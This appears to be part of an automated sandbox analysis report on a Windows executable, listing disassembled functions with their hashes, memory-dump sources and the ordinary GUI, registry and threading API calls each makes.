                                                                                • Opcode ID: b9cfce401f17aa31cfb29ccd402e4a82264f25bb83de7431e2aff57b39af9e2c
                                                                                • Instruction ID: 1fe094588a0e961be141cfb79aa9b7f3fec2b3763f547fbcd9ce51cabbcc919e
                                                                                • Opcode Fuzzy Hash: b9cfce401f17aa31cfb29ccd402e4a82264f25bb83de7431e2aff57b39af9e2c
                                                                                • Instruction Fuzzy Hash: 741154796042117EE200AB15AC05FABB398EF95765F404429FD1492240E778A94A8BAF
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetWindow.USER32(?,00000005), ref: 004275F3
                                                                                • GetWindow.USER32(00000000,00000005), ref: 0042760F
                                                                                • GetWindow.USER32(00000000,00000002), ref: 00427625
                                                                                • GetWindow.USER32(00000000,00000002), ref: 00427630
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window
                                                                                • String ID:
                                                                                • API String ID: 2353593579-0
                                                                                • Opcode ID: 0c8130be8dbde7bc21ddb6305222a4dfbe05682fe96a044a3176c088959609aa
                                                                                • Instruction ID: 7973c777c7684f649d9f1fe3c027d690b52e0caa17278d6769f24246e1f79e53
                                                                                • Opcode Fuzzy Hash: 0c8130be8dbde7bc21ddb6305222a4dfbe05682fe96a044a3176c088959609aa
                                                                                • Instruction Fuzzy Hash: 44F0F46330971232D221656E3C8AF6BBB988BE1F61F80003BF20096282FE59C805423D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Hook$CallLongMessageNextSendUnhookWindowWindows
                                                                                • String ID:
                                                                                • API String ID: 4187046592-0
                                                                                • Opcode ID: fc15d09849e8097207f4dcf02ca075e96df04ae3ebb25c062f27d6495c69d0ce
                                                                                • Instruction ID: 4b643680d531ce21709dbc3d3d9936dd58ebad54b3506d151bcb09dffef7e68c
                                                                                • Opcode Fuzzy Hash: fc15d09849e8097207f4dcf02ca075e96df04ae3ebb25c062f27d6495c69d0ce
                                                                                • Instruction Fuzzy Hash: 01114679600210AFE214DF19EC49E577BE9FB89311F80897EFA45C32A0D7B4E844CB19
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetWindow.USER32(?,00000005), ref: 004276F5
                                                                                • GetWindowLongA.USER32 ref: 00427702
                                                                                • SetTextColor.GDI32(?,00000000), ref: 0042771F
                                                                                • SetBkColor.GDI32(?,00000000), ref: 0042772D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ColorWindow$LongText
                                                                                • String ID:
                                                                                • API String ID: 3945788684-0
                                                                                • Opcode ID: d117eeae12befd817f81a42662413f153beabfd8ab81fdc14de5bd2b65c25d18
                                                                                • Instruction ID: e9e0c078f4f095c576031995d216991a795bed2baff42fc2bf4ce7406c29b5fa
                                                                                • Opcode Fuzzy Hash: d117eeae12befd817f81a42662413f153beabfd8ab81fdc14de5bd2b65c25d18
                                                                                • Instruction Fuzzy Hash: DA01B53631E1209BDB20DB64BC48DDB7754F7A2321F51493BF441C3190D618AA42C26E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00427076
                                                                                • EnterCriticalSection.KERNEL32(0044E660), ref: 00427083
                                                                                • UnhookWindowsHookEx.USER32(?), ref: 004270C6
                                                                                • LeaveCriticalSection.KERNEL32(0044E660), ref: 0042710B
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CriticalSection$CurrentEnterHookLeaveThreadUnhookWindows
                                                                                • String ID:
                                                                                • API String ID: 1197249173-0
                                                                                • Opcode ID: b526f28ec88201e747763d545dd85fe99f5833e47907bcd38130007adc8c3076
                                                                                • Instruction ID: 1d88796f88b6287541be23973861e02c99c105cf5f3fe9de7b99daef2b075597
                                                                                • Opcode Fuzzy Hash: b526f28ec88201e747763d545dd85fe99f5833e47907bcd38130007adc8c3076
                                                                                • Instruction Fuzzy Hash: B911CE74204658CFD720DF2AF844A6A73B5FB21302FC2457BF50683261DB7AA895CB6D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$MessageSend
                                                                                • String ID:
                                                                                • API String ID: 1496643700-0
                                                                                • Opcode ID: 3b76b733c8a065dc6ece5aa5bab190c52c855fea594cedea1f79651ef2b1cb83
                                                                                • Instruction ID: e6c9ddb7f09297e24d387d9ccb7d5983debcd3fb8e4fafe036d0fe851a1ef5ff
                                                                                • Opcode Fuzzy Hash: 3b76b733c8a065dc6ece5aa5bab190c52c855fea594cedea1f79651ef2b1cb83
                                                                                • Instruction Fuzzy Hash: 50014032100229BBCF126F92AC44EDF3B26EF09352F448022FE1155160C73AC931EBE9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$Item
                                                                                • String ID:
                                                                                • API String ID: 369458955-0
                                                                                • Opcode ID: 905548e616ebf9b7f01c7a7c30a2917865fe36aa6cdc49e37fce1b3057b69f02
                                                                                • Instruction ID: ba454663a5bc4973feb4871b6fad6446c384b15e901a80391e672636eb6377ff
                                                                                • Opcode Fuzzy Hash: 905548e616ebf9b7f01c7a7c30a2917865fe36aa6cdc49e37fce1b3057b69f02
                                                                                • Instruction Fuzzy Hash: 42018432201235A7CB223F62BC44A9F7758AF44756F44C032FD0091110D739C91196ED
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Item$EnableFocusMenuNextParent
                                                                                • String ID:
                                                                                • API String ID: 988757621-0
                                                                                • Opcode ID: 49aa1afeb8f5b243dd53646bf734e1264a88fea6aedff110ede8a8f0e90f70fa
                                                                                • Instruction ID: 82d9ef6b61968b264c5194fceab843e61d0be6a46d3b9ec2fbe04c224fb07a28
                                                                                • Opcode Fuzzy Hash: 49aa1afeb8f5b243dd53646bf734e1264a88fea6aedff110ede8a8f0e90f70fa
                                                                                • Instruction Fuzzy Hash: 1211A170610A109FDB299F25EC19B6BB7B5EF40715F548A6EF152831A0CB78E881CB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 004272B6
                                                                                • EnterCriticalSection.KERNEL32(0044E660), ref: 004272C3
                                                                                • UnhookWindowsHookEx.USER32(?), ref: 004272FA
                                                                                • LeaveCriticalSection.KERNEL32(0044E660), ref: 00427339
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CriticalSection$CurrentEnterHookLeaveThreadUnhookWindows
                                                                                • String ID:
                                                                                • API String ID: 1197249173-0
                                                                                • Opcode ID: a80b8c0cc45658d9d96590c75b3bca3cd5df597524dda87c94283b0c11b01651
                                                                                • Instruction ID: 804b54161b112c52b27582448d90f526dafddecbff0a4d3454560e8264dfc497
                                                                                • Opcode Fuzzy Hash: a80b8c0cc45658d9d96590c75b3bca3cd5df597524dda87c94283b0c11b01651
                                                                                • Instruction Fuzzy Hash: D001B57520461C8FD720DF6AF844A6A73A4F721302FC205BAE90683150E735A951DF58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 0043056A
                                                                                • RegCloseKey.ADVAPI32(00000000,?,?), ref: 00430573
                                                                                • wsprintfA.USER32 ref: 0043058F
                                                                                • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 004305A8
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ClosePrivateProfileStringValueWritewsprintf
                                                                                • String ID:
                                                                                • API String ID: 1902064621-0
                                                                                • Opcode ID: 5d9834ed028593e6228c507318c193ed456161fe9bc6e098289be67986216517
                                                                                • Instruction ID: a302ace364950ebbacf57e9a1ca98f35e01bce7b99a5336a218e87213a5c3b82
                                                                                • Opcode Fuzzy Hash: 5d9834ed028593e6228c507318c193ed456161fe9bc6e098289be67986216517
                                                                                • Instruction Fuzzy Hash: 2E01A232440219BFCB129F64DC05FEB3BB9AF08725F045526FA11D6060D774C650CB88
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetObjectA.GDI32(00000000,0000000C,?), ref: 0042CEE4
                                                                                • SetBkColor.GDI32(00000000,00000000), ref: 0042CEF0
                                                                                • GetSysColor.USER32(00000008), ref: 0042CF00
                                                                                • SetTextColor.GDI32(00000000,?), ref: 0042CF0A
                                                                                  • Part of subcall function 0042FDE6: GetWindowLongA.USER32 ref: 0042FDF7
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Color$LongObjectTextWindow
                                                                                • String ID:
                                                                                • API String ID: 2871169696-0
                                                                                • Opcode ID: f382a1cc379d1b8ff616fb7cc4ceb1e2396075119803a9ce0110f24f19010e9e
                                                                                • Instruction ID: fcae4d56d620289676d5e110a269507cbca609aa6386b23e779b5878349a6538
                                                                                • Opcode Fuzzy Hash: f382a1cc379d1b8ff616fb7cc4ceb1e2396075119803a9ce0110f24f19010e9e
                                                                                • Instruction Fuzzy Hash: 9B016D30200118BBDF219F64FEC9BAF3B76AB04391F914522F912C61E4C7B8CD90CA69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetClientRect.USER32 ref: 00402868
                                                                                • GetSystemMetrics.USER32 ref: 00402870
                                                                                • GetSystemMetrics.USER32 ref: 00402885
                                                                                • InvalidateRect.USER32(00000000,?,00000001,?,00401B44,FFFFFFB7,00000001), ref: 004028AC
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: MetricsRectSystem$ClientInvalidate
                                                                                • String ID:
                                                                                • API String ID: 1762366858-0
                                                                                • Opcode ID: 063495eb32c4c5b4f6b9d6c15002a58220cf0273f99b4b24a4f50ef27cbf055f
                                                                                • Instruction ID: f779e5217fbf947dbec22688a3cc3a8211e8b536dd80d4325fa1e9902a4fdb8e
                                                                                • Opcode Fuzzy Hash: 063495eb32c4c5b4f6b9d6c15002a58220cf0273f99b4b24a4f50ef27cbf055f
                                                                                • Instruction Fuzzy Hash: A201A875600208EFD704DF98D988AAA7BB5FB88351F14C158FD098B395CA75EE81CF94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: TextWindow$lstrcmplstrlen
                                                                                • String ID:
                                                                                • API String ID: 330964273-0
                                                                                • Opcode ID: 918e3acf9e94d59409ae996563e8c5bb62672b90b12cfe0fde6d4385fb5baee6
                                                                                • Instruction ID: 8e6d11570b8ce11b172cb89db83b30c0780367cdce52d8cc2af1e92033d5dd16
                                                                                • Opcode Fuzzy Hash: 918e3acf9e94d59409ae996563e8c5bb62672b90b12cfe0fde6d4385fb5baee6
                                                                                • Instruction Fuzzy Hash: 11F01236500018BBDF226F64EC08ADF7B79FB09362F408172F849D5120D774CE948B94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetCPInfo.KERNEL32(?,00000000), ref: 004235A9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Info
                                                                                • String ID: $
                                                                                • API String ID: 1807457897-3032137957
                                                                                • Opcode ID: f222b232fef16415c30678ad8ef91520bf46dadd03e1af0c2b2d4a81457ea529
                                                                                • Instruction ID: fb0fe3ba0ffb0af075cd4e2988264672a84fbfd18e34bcf4f51c6b1cd9466352
                                                                                • Opcode Fuzzy Hash: f222b232fef16415c30678ad8ef91520bf46dadd03e1af0c2b2d4a81457ea529
                                                                                • Instruction Fuzzy Hash: 43417A312041782AEB219B15ED4ABEB7FBDEB06709F5804E6D585C7253C23D4B44CBAB
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetOpenFileNameA.COMDLG32(0000004C), ref: 00421444
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FileNameOpen
                                                                                • String ID: $L
                                                                                • API String ID: 2203442278-1234072559
                                                                                • Opcode ID: 4736dc1b3d7b87e6390852a3d56834295071ca43c1119826cff9388d23b4c44a
                                                                                • Instruction ID: e5c4556a4fc19836bacf0eecf2f74134e8ef6d3b2efadf20e33fee31bfd061bf
                                                                                • Opcode Fuzzy Hash: 4736dc1b3d7b87e6390852a3d56834295071ca43c1119826cff9388d23b4c44a
                                                                                • Instruction Fuzzy Hash: 5821A2B0E0125C9FDB04DFD4D84479DFBB5BF48304F60416AD409AB394D7795949CB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetPropA.USER32 ref: 0040210A
                                                                                  • Part of subcall function 00402296: ScreenToClient.USER32 ref: 004022E4
                                                                                  • Part of subcall function 00402296: PtInRect.USER32(00000000,00000000,00000084), ref: 004022FE
                                                                                • CallWindowProcA.USER32 ref: 00402152
                                                                                Strings
                                                                                • ___CResizeCtrl___Class___, xrefs: 00402101
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CallClientProcPropRectScreenWindow
                                                                                • String ID: ___CResizeCtrl___Class___
                                                                                • API String ID: 1382046119-3260620844
                                                                                • Opcode ID: f660d251a43cb1359749e2853ce4d586b2b24f75575abb44e41476efb81de708
                                                                                • Instruction ID: 696eb42a7d0fa06531ce0648a6a7044e0283508fe09d46f4eb69b048210bbe71
                                                                                • Opcode Fuzzy Hash: f660d251a43cb1359749e2853ce4d586b2b24f75575abb44e41476efb81de708
                                                                                • Instruction Fuzzy Hash: 6801C875A04208FFCB04DF98D984E9EBBB9AF8C311F1081A9F919A7384D774AE51CB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetClassNameA.USER32(?,?,00000010), ref: 0042849E
                                                                                • lstrcmpA.KERNEL32(?,ComboBox,?,00000010), ref: 004284AE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ClassNamelstrcmp
                                                                                • String ID: ComboBox
                                                                                • API String ID: 3770760073-1152790111
                                                                                • Opcode ID: fec2ed8e2c9bd21b0bc795d1cc55ab0f518fecabd309f259a61aa71286f08952
                                                                                • Instruction ID: 2f54a45aece28879db2e6d61642cbce0fa6f618f568b613808186d7d2e2f4277
                                                                                • Opcode Fuzzy Hash: fec2ed8e2c9bd21b0bc795d1cc55ab0f518fecabd309f259a61aa71286f08952
                                                                                • Instruction Fuzzy Hash: 26E0DF70B112015BEB10AF289C09B2A72A4F780302FC44D5CF008C11A0FB7DD694820A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 004318A7
                                                                                • LeaveCriticalSection.KERNEL32(?,?), ref: 004318B7
                                                                                • LocalFree.KERNEL32(?), ref: 004318C0
                                                                                • TlsSetValue.KERNEL32(?,00000000), ref: 004318D6
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                                • String ID:
                                                                                • API String ID: 2949335588-0
